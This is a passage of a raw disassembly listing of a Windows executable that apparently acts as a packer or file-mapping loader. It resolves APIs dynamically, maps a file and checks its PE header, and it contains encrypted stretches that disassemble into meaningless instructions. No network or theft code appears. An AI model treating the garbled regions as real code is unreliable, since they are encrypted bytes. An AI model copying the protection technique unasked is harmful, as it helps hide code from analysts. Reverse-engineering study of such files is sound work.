call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67D4, eax
push offset aWvsprintfa ; "wvsprintfA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67D8, eax
push offset aGdi32_dll_0 ; "gdi32.dll"
call ds:dword_4E675C ;; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4D396D
push 0
push 0
push 0
push 0EF0000F6h
call ds:dword_4E300C ;; RaiseException
loc_4D396D: ; CODE XREF: sub_4D32E0+67A�j
push offset aAddfontresourc ; "AddFontResourceA"
mov eax, [ebp+var_8]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67DC, eax
push offset aCreatecompat_0 ; "CreateCompatibleDC"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67E0, eax
push offset aCreatedibsec_0 ; "CreateDIBSection"
mov edx, [ebp+var_8]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67E4, eax
push offset aDeletedc_0 ; "DeleteDC"
mov eax, [ebp+var_8]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67E8, eax
push offset aRemovefontreso ; "RemoveFontResourceA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67EC, eax
push offset aBeginpaint ; "BeginPaint"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67F0, eax
push offset aEndpaint ; "EndPaint"
mov eax, [ebp+var_10]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67F4, eax
push offset aGetobjecta ; "GetObjectA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67F8, eax
push offset aSelectobject_0 ; "SelectObject"
mov edx, [ebp+var_8]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E67FC, eax
push offset aDeleteobject_0 ; "DeleteObject"
mov eax, [ebp+var_8]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6800, eax
push offset aBitblt_0 ; "BitBlt"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6804, eax
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6808, eax
push offset aSetactivewindo ; "SetActiveWindow"
mov eax, [ebp+var_10]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E680C, eax
push offset aSetforegroundw ; "SetForegroundWindow"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6810, eax
push offset aRegisterclasse ; "RegisterClassExA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6814, eax
push offset aGetsystemmetri ; "GetSystemMetrics"
mov eax, [ebp+var_10]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6818, eax
push offset aCreatewindowex ; "CreateWindowExA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E681C, eax
push offset aGetmessagea ; "GetMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6820, eax
push offset aTranslatemessa ; "TranslateMessage"
mov eax, [ebp+var_10]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6824, eax
push offset aDispatchmessag ; "DispatchMessageA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6828, eax
push offset aDestroywindo_0 ; "DestroyWindow"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E682C, eax
push offset aEnumwindows ; "EnumWindows"
mov eax, [ebp+var_10]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6830, eax
push offset aDefwindowproca ; "DefWindowProcA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6834, eax
push offset aPostmessagea ; "PostMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6838, eax
push offset aCreatethread ; "CreateThread"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E683C, eax
mov [ebp+var_4], offset dword_4E66A4
mov [ebp+var_14], offset dword_4E6840
jmp short loc_4D3B7A
; ---------------------------------------------------------------------------
loc_4D3B71: ; CODE XREF: sub_4D32E0:loc_4D3BA9�j
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
loc_4D3B7A: ; CODE XREF: sub_4D32E0+88F�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_14]
jz short loc_4D3BAB
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_4D3BA9
push 0
push 0
push 0
mov ecx, [ebp+var_4]
sub ecx, offset dword_4E66A0
sar ecx, 2
sub ecx, 10FFEFFFh
push ecx
call ds:dword_4E300C ;; RaiseException
loc_4D3BA9: ; CODE XREF: sub_4D32E0+8A8�j
jmp short loc_4D3B71
; ---------------------------------------------------------------------------
loc_4D3BAB: ; CODE XREF: sub_4D32E0+8A0�j
mov esp, ebp
pop ebp
retn
sub_4D32E0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3298
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-24h], 0FFFFFFFFh
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-28h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call ds:dword_4E66A8 ;; CreateFileA
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short loc_4D3C6C
push 0
mov ecx, [ebp-24h]
push ecx
call ds:dword_4E6700 ;; GetFileSize
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0FFFFFFFFh
jz short loc_4D3C6C
push 0
mov edx, [ebp-1Ch]
push edx
push 0
push 2
push 0
mov eax, [ebp-24h]
push eax
call ds:dword_4E66B0 ;; CreateFileMappingA
mov [ebp-20h], eax
cmp dword ptr [ebp-20h], 0
jz short loc_4D3C6C
mov ecx, [ebp-1Ch]
push ecx
push 0
push 0
push 4
mov edx, [ebp-20h]
push edx
call ds:dword_4E676C ;; MapViewOfFile
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jnz short loc_4D3C76
loc_4D3C6C: ; CODE XREF: _4:004D3C19�j _4:004D3C2E�j ...
mov ecx, 0EF000001h
call sub_4DD342
loc_4D3C76: ; CODE XREF: _4:004D3C6A�j
mov eax, [ebp-28h]
mov ecx, [ebp-28h]
add ecx, [eax+3Ch]
mov [ebp-30h], ecx
mov edx, [ebp-30h]
cmp dword ptr [edx], 4550h
jz short loc_4D3C97
mov ecx, 0EF000002h
call sub_4DD342
loc_4D3C97: ; CODE XREF: _4:004D3C8B�j
mov eax, ds:off_4E669C
mov [ebp-34h], eax
mov ecx, [ebp-30h]
mov edx, [ebp+10h]
sub edx, [ecx+34h]
mov [ebp-2Ch], edx
push 1190000h
call sub_4D2B7E
add ds:11417799h, cl ; CODE XREF: _4:004D3CCB�j
stosd
add eax, 1EEE403Fh
sub al, 39h
inc esi
cmp ebx, [eax+1F877A6Dh]
in al, dx
jle short near ptr loc_4D3CB5+2
inc ebx
cwde
out dx, al
pop es
xor eax, [ebx+78F72316h]
adc byte ptr [edi+64h], 71h
jle short near ptr loc_4D3D3B+2
xchg eax, ecx
db 2Eh
out 77h, eax
dec edi
sbb esp, edi
jp short loc_4D3D3B
lds edx, [ecx+4B7AFC62h]
retn
; ---------------------------------------------------------------------------
push cs
cmp eax, [edx-49E3E080h]
retn
; ---------------------------------------------------------------------------
db 0D0h, 56h, 0E7h
dd 1E5F626Fh, 6B46D1A8h, 0EE0CA412h, 0D165F518h, 0AB6AFC15h
dd 0F6588337h, 5A597004h, 1A93DEAh, 35E370C2h, 328E108Eh
dd 0EA5487D7h, 599515B8h, 0DC957533h, 2AB9E510h, 0F6E956BFh
dd 41D55588h
db 0F7h, 6Ch, 0DAh
; ---------------------------------------------------------------------------
loc_4D3D3B: ; CODE XREF: _4:004D3CE4�j _4:004D3CDB�j
adc edi, [edi+14D244FBh]
stc
jnz short loc_4D3D91
loc_4D3D44: ; CODE XREF: _4:004D3D45�j
xchg eax, edi
loop loc_4D3D44
rol esi, 1
inc esp
stosb
arpl bx, si
and ebx, [edx+ecx*2+1D4529E4h] ; CODE XREF: _4:004D3DC7�j
out 68h, al
mov esi, 7AF0DD8Eh
mov bl, 0DFh
xchg eax, ebp
jno short loc_4D3D9A
jg short loc_4D3D80
shr byte ptr [ebx], cl
jg short loc_4D3DCE
mov bh, 10h
cmpsd
mov ah, 2Ah
hlt
; ---------------------------------------------------------------------------
dd 693DAD50h, 3BA234CFh, 6A1336DFh, 8E90F8F4h, 59E2CEABh
; ---------------------------------------------------------------------------
loc_4D3D80: ; CODE XREF: _4:004D3D60�j
mov ah, [edx+edx*4]
aam 3Bh
stosd
push 7118CCF6h
jle short loc_4D3DB7
add eax, eax
push 0FFFFFFC4h
loc_4D3D91: ; CODE XREF: _4:004D3D42�j
outsb
loope near ptr loc_4D3DEE+3
cmpsb
cmp al, 76h
inc edi
iret
; ---------------------------------------------------------------------------
daa
loc_4D3D9A: ; CODE XREF: _4:004D3D5E�j
jge short near ptr loc_4D3DC9+1
pop edi
or esi, ebp
aas
jnb short near ptr loc_4D3E04+2
db 67h
das
mov bl, 0C0h
and al, 0E9h
sbb [ebx], cl
dec cl
pop esi
aam 35h
inc edx
dec edi
pop esp
loc_4D3DB2: ; DATA XREF: _5:004E32A8�o
and byte ptr [esi+3Bh], 91h
popf
loc_4D3DB7: ; CODE XREF: _4:004D3D8B�j
stosb
mov bh, 7
loc_4D3DBA: ; DATA XREF: _5:004E32AC�o
pop edx
mov ebx, 0EE403F03h
pop ds
sub al, 39h
inc esi
loc_4D3DC4: ; CODE XREF: _4:004D3DD4�j
cmp edi, [ecx+6Ch]
jp short near ptr loc_4D3D4D+3
loc_4D3DC9: ; CODE XREF: _4:loc_4D3D9A�j
jl short near ptr loc_4D3DD6+6
inc ebx
inc esp
aaa
loc_4D3DCE: ; CODE XREF: _4:004D3D64�j
nop
nop
xor edx, edx
test edx, edx
jnz short loc_4D3DC4
loc_4D3DD6: ; CODE XREF: _4:loc_4D3DC9�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4D3DE4
jmp short loc_4D3E15
; =============== S U B R O U T I N E =======================================
sub_4D3DE4 proc near ; CODE XREF: _4:004D3DDD�p
; DATA XREF: _5:004E32A0�o
cmp dword ptr [ebp-28h], 0
jz short loc_4D3DF4
mov eax, [ebp-28h]
push eax
loc_4D3DEE: ; CODE XREF: _4:004D3D92�j
call ds:dword_4E67A0 ;; UnmapViewOfFile
loc_4D3DF4: ; CODE XREF: sub_4D3DE4+4�j
cmp dword ptr [ebp-20h], 0
jz short loc_4D3E04
mov ecx, [ebp-20h]
push ecx
call ds:dword_4E66A4 ;; CloseHandle
loc_4D3E04: ; CODE XREF: sub_4D3DE4+14�j
; _4:004D3DA0�j
cmp dword ptr [ebp-24h], 0
jz short locret_4D3E14
mov edx, [ebp-24h]
push edx
call ds:dword_4E66A4 ;; CloseHandle
locret_4D3E14: ; CODE XREF: sub_4D3DE4+24�j
retn
sub_4D3DE4 endp
; ---------------------------------------------------------------------------
loc_4D3E15: ; CODE XREF: _4:004D3DE2�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E32B0
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE88h
push ebx
push esi
push edi
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 105h
call sub_4DD35A
add esp, 4
mov [ebp-184h], eax
mov eax, [ebp-184h]
mov [ebp-1Ch], eax
push 104h
mov ecx, [ebp-1Ch]
push ecx
push 0
call ds:dword_4E6718 ;; GetModuleHandleA
push eax
call ds:dword_4E6714 ;; GetModuleFileNameA
mov edx, [ebp+0Ch]
add edx, 82h
mov [ebp-24h], edx
mov eax, [ebp-24h]
mov ecx, [eax]
and ecx, 4
neg ecx
sbb ecx, ecx
neg ecx
mov [ebp-20h], ecx
cmp dword ptr [ebp-20h], 0
jz loc_4D3FFE
lea ecx, [ebp-160h]
call sub_4DC798
mov dword ptr [ebp-164h], 10h
push 290000h
call sub_4D2B7E
nop
popf
sub ebp, esi
mov cl, 93h
cmp esi, [ebp-2071CF1Dh]
adc [esi+edx], esp
cmp eax, 7CBB222Fh
push ecx
cmc
dec esp
retn
; ---------------------------------------------------------------------------
db 97h, 0B9h, 0ADh
dd 8ABDEFA0h, 9EAD89FBh, 2913CC7h, 0B285F704h, 96CCFC1Ch
dd 7F09E16h, 414E5A1Bh, 5268559Ah, 0CEE6F301h, 5A4DC906h
dd 0AA81500Fh, 2EF9409Bh, 66792330h, 0F898C230h, 0DBDCAA42h
dd 6D7A86E7h, 0CA3421CFh, 12121F2Ch, 2E21267Bh, 41556C53h
dd 7AA1946Fh, 5A2D4F5Ch, 37742DE4h, 3A4FF67Eh, 345119B4h
dd 65810DFEh, 5D294B58h, 6AF5E8E6h, 36541C2Ch, 95B155ABh
dd 0AD011488h, 0A7053D6Bh, 0EB46731h, 0C4A9AD9Ah, 3BEAABB8h
dd 2A000177h, 11364351h, 0F5037066h, 3E3124E8h, 0F96AB34Bh
dd 59670CFAh, 0DB0D434Ch, 0F081716Eh, 0FFB6D7E4h, 8996A2CFh
dd 2180E38Ch, 212F443Ah, 96907314h, 0CDC6D3E1h, 8593E8D6h
dd 24A5A778h, 1C5D4D32h, 0DDE20310h, 0C1357DA8h, 818FECC2h
dd 8EF4A374h, 0E560C6CBh, 0F2E200F3h, 4E41A771h, 82751533h
dd 5D21748Fh, 90902F3Ch, 0C085C033h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_4D3FFE: ; CODE XREF: _4:004D3EC0�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4D400C
jmp short loc_4D4025
; =============== S U B R O U T I N E =======================================
sub_4D400C proc near ; CODE XREF: _4:004D4005�p
; DATA XREF: _5:004E32B8�o
mov ecx, [ebp-1Ch]
mov [ebp-188h], ecx
mov edx, [ebp-188h]
push edx
call sub_4DD3DD
add esp, 4
retn
sub_4D400C endp
; ---------------------------------------------------------------------------
loc_4D4025: ; CODE XREF: _4:004D400A�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4036 proc near ; CODE XREF: sub_4E01EA+1F�p
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D4153 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E32C0
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
or [ebp+var_1C], 0FFFFFFFFh
push 0
lea eax, [ebp+var_1C]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_4D5346
test eax, eax
jz loc_4D4153
cmp [ebp+var_1C], 0FFFFFFFFh
jz loc_4D4153
mov eax, ds:dword_4E68E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D40A7
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_4D40AB
; ---------------------------------------------------------------------------
loc_4D40A7: ; CODE XREF: sub_4D4036+5C�j
and [ebp+var_30], 0
loc_4D40AB: ; CODE XREF: sub_4D4036+6F�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_4D4153
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D4120
push [ebp+var_1C]
call sub_4DA456
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
cmp [ebp+var_20], 0
jnz short loc_4D40FF
push ds:off_4E34F8
push 1Fh
push ds:off_4E34FC
call sub_4DD48C
loc_4D40FF: ; CODE XREF: sub_4D4036+B4�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_24], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_4D4155
; ---------------------------------------------------------------------------
loc_4D4120: ; CODE XREF: sub_4D4036+A0�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D412B
jmp short loc_4D4153
sub_4D4036 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4D412B proc near ; CODE XREF: sub_4D4036+EE�p
; DATA XREF: _5:004E32C8�o
mov eax, ds:dword_4E68E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short loc_4D4146
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
loc_4D4146: ; CODE XREF: sub_4D412B+C�j
lea eax, [ebp-28h]
push eax
push dword ptr [ebp-1Ch]
call sub_4D5741
locret_4D4152: ; DATA XREF: _2:off_42E644�o
retn
sub_4D412B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D4036
loc_4D4153: ; CODE XREF: sub_4D4036+40�j
; sub_4D4036+4A�j ...
xor eax, eax
loc_4D4155: ; CODE XREF: sub_4D4036+E8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D4036
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4166 proc near ; CODE XREF: sub_4D4252+1B5�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_4D4187
mov ecx, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov esi, [ebp+arg_0]
xor eax, eax
repe cmpsb
jnz loc_4D424A
loc_4D4187: ; CODE XREF: sub_4D4166+C�j
push 5Ch
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
call sub_4D1640
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4D4216
mov eax, [ebp+arg_C]
mov byte ptr [eax], 1
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
inc eax
cmp eax, 80h
jbe short loc_4D41C6
xor eax, eax
jmp loc_4D424C
; ---------------------------------------------------------------------------
loc_4D41C6: ; CODE XREF: sub_4D4166+57�j
mov ecx, [ebp+var_C]
mov esi, [ebp+arg_8]
add esi, [ebp+arg_4]
mov edi, offset byte_4E6844
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_C]
and ds:byte_4E6844[eax], 0
mov eax, [ebp+arg_10]
mov dword ptr [eax], offset byte_4E6844
push offset byte_4E6844
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_4D106B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
jmp short loc_4D424C
; ---------------------------------------------------------------------------
loc_4D4216: ; CODE XREF: sub_4D4166+38�j
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_4D106B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov eax, [ebp+var_10]
jmp short loc_4D424C
; ---------------------------------------------------------------------------
loc_4D424A: ; CODE XREF: sub_4D4166+1B�j
xor eax, eax
loc_4D424C: ; CODE XREF: sub_4D4166+5B�j
; sub_4D4166+AE�j ...
pop edi
pop esi
leave
retn 14h
sub_4D4166 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4252 proc near ; CODE XREF: sub_4D463E+56�p
; sub_4D46DE+90�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004D462B SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E32D0
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
push offset dword_4E68C8
call ds:dword_4E66C4 ;; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_4E6908, 0
jnz short loc_4D42A8
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp loc_4D462D
; ---------------------------------------------------------------------------
loc_4D42A8: ; CODE XREF: sub_4D4252+3B�j
and [ebp+var_24], 0
lea eax, [ebp+var_24]
push eax
mov eax, ds:dword_4E6908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_4E6708 ;; GetFullPathNameA
mov [ebp+var_28], eax
push [ebp+var_28]
mov eax, ds:dword_4E6908
add eax, 810h
push eax
call ds:dword_4E67C8 ;; CharUpperBuffA
mov ecx, [ebp+var_28]
call sub_4D6470
mov eax, ds:dword_4E6908
mov eax, [eax+0Ch]
mov [ebp+var_20], eax
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_30], 0
mov eax, ds:dword_4E6908
mov ecx, [eax+0C14h]
mov edi, ds:dword_4E6908
add edi, 10h
mov esi, ds:dword_4E6908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_4D4614
mov eax, ds:dword_4E6908
mov eax, [eax+0C14h]
mov ecx, ds:dword_4E6908
lea eax, [ecx+eax+810h]
mov [ebp+var_3C], eax
and [ebp+var_38], 0
push 5Ch
push [ebp+var_3C]
call sub_4D1700
pop ecx
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_4D4369
mov eax, [ebp+var_34]
sub eax, [ebp+var_3C]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D4395
; ---------------------------------------------------------------------------
loc_4D4369: ; CODE XREF: sub_4D4252+109�j
mov eax, ds:dword_4E6684
mov eax, [eax+24h]
and eax, 20h
test eax, eax
jnz short loc_4D4391
push 0FFFFFFFFh
and [ebp+var_50], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_50]
jmp loc_4D462D
; ---------------------------------------------------------------------------
loc_4D4391: ; CODE XREF: sub_4D4252+124�j
and [ebp+var_38], 0
loc_4D4395: ; CODE XREF: sub_4D4252+115�j
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
test ecx, ecx
jnz short loc_4D43B1
cmp [ebp+arg_8], 0
jnz short loc_4D43B1
jmp loc_4D45EB
; ---------------------------------------------------------------------------
loc_4D43B1: ; CODE XREF: sub_4D4252+152�j
; sub_4D4252+158�j
cmp [ebp+arg_8], 0
jz short loc_4D43D4
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jz short loc_4D43D4
mov eax, [ebp+arg_8]
mov ecx, ds:dword_4E6908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
inc eax
mov [ebp+var_1C], eax
loc_4D43D4: ; CODE XREF: sub_4D4252+163�j
; sub_4D4252+16B�j
jmp short loc_4D43DD
; ---------------------------------------------------------------------------
loc_4D43D6: ; CODE XREF: sub_4D4252:loc_4D4412�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4D43DD: ; CODE XREF: sub_4D4252:loc_4D43D4�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb short loc_4D4414
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
push dword ptr [eax]
push [ebp+var_38]
push [ebp+var_3C]
call sub_4D4166
test eax, eax
jz short loc_4D4412
jmp short loc_4D4414
; ---------------------------------------------------------------------------
loc_4D4412: ; CODE XREF: sub_4D4252+1BC�j
jmp short loc_4D43D6
; ---------------------------------------------------------------------------
loc_4D4414: ; CODE XREF: sub_4D4252+191�j
; sub_4D4252+1BE�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb loc_4D45EB
mov edi, [ebp+var_2C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_48], ecx
movzx eax, [ebp+var_30]
test eax, eax
jz short loc_4D44AC
jmp short loc_4D4441
; ---------------------------------------------------------------------------
loc_4D443A: ; CODE XREF: sub_4D4252:loc_4D44AA�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4D4441: ; CODE XREF: sub_4D4252+1E6�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_1C], eax
jnb short loc_4D44AC
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov edi, [eax]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_48]
add eax, [ebp+var_38]
cmp ecx, eax
jb short loc_4D44A8
mov ecx, [ebp+var_48]
add ecx, [ebp+var_38]
mov eax, [ebp+var_1C]
shl eax, 4
mov edx, ds:dword_4E6908
mov edx, [edx+8]
mov eax, [edx+eax]
mov edi, [eax]
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov edx, ds:dword_4E6908
mov edx, [edx+8]
mov eax, [edx+eax]
mov esi, [eax]
xor eax, eax
repe cmpsb
jz short loc_4D44AA
loc_4D44A8: ; CODE XREF: sub_4D4252+21F�j
jmp short loc_4D44AC
; ---------------------------------------------------------------------------
loc_4D44AA: ; CODE XREF: sub_4D4252+254�j
jmp short loc_4D443A
; ---------------------------------------------------------------------------
loc_4D44AC: ; CODE XREF: sub_4D4252+1E4�j
; sub_4D4252+1F6�j ...
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
mov eax, [ecx+eax+4]
add eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
mov eax, [eax]
mov [ebp+var_44], eax
xor eax, eax
mov edi, [ebp+arg_4]
stosd
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 2Ch
rep stosd
cmp [ebp+var_48], 104h
jnb short loc_4D4505
mov eax, [ebp+var_48]
mov [ebp+var_54], eax
jmp short loc_4D450C
; ---------------------------------------------------------------------------
loc_4D4505: ; CODE XREF: sub_4D4252+2A9�j
mov [ebp+var_54], 104h
loc_4D450C: ; CODE XREF: sub_4D4252+2B1�j
mov ecx, [ebp+var_54]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 2Ch
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 130h
stosd
stosd
stosd
stosw
cmp [ebp+var_48], 0Eh
